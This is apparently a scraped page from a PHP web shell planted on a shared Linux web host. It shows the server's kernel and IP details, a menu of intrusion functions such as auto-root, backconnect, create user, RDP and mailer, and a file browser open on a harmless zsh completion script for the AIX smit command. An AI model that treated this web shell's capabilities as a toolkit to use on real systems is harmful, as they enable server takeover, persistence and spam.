Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
AIX /
[ HOME SHELL ]
Name
Size
Permission
Action
_floppy
110
B
-rw-r--r--
_logical_volumes
455
B
-rw-r--r--
_lscfg
658
B
-rw-r--r--
_lsdev
1.39
KB
-rw-r--r--
_lslv
348
B
-rw-r--r--
_lspv
432
B
-rw-r--r--
_lsvg
505
B
-rw-r--r--
_object_classes
146
B
-rw-r--r--
_physical_volumes
124
B
-rw-r--r--
_smit
856
B
-rw-r--r--
_volume_groups
87
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _smit
#compdef smit smitty local state line expl curcontext="$curcontext" _arguments -C \ '-s[specify smit.script file]:smit.script file:_files' \ '-l[specify smit.log file]:smit.log file:_files' \ '-C[use curses interface]' \ '-D[debug mode]' \ '-d[FastPath is dialogue screen]' \ '-f[allow redirection of stdin and stdout]' \ '-h[display help/usage message]' \ '-M[start smit in windows mode]' \ '-m[FastPath is menu screen]' \ '-n[FastPath is selector screen]' \ '-o[alternate SMIT/ODM database]' \ '-t[generate trace information]' \ '-v[verbose]' \ '-x[do not run any execute commands]' \ '-X[do not run any commands]' \ '1:fast path:->fastpath' [[ "$state" = fastpath ]] && (( $+commands[odmget] )) && _wanted fastpaths expl 'fast path' compadd \ $(odmget sm_cmd_hdr sm_name_hdr|sed -n 's/^ id = \"\(.*\)\"/\1/p')
Close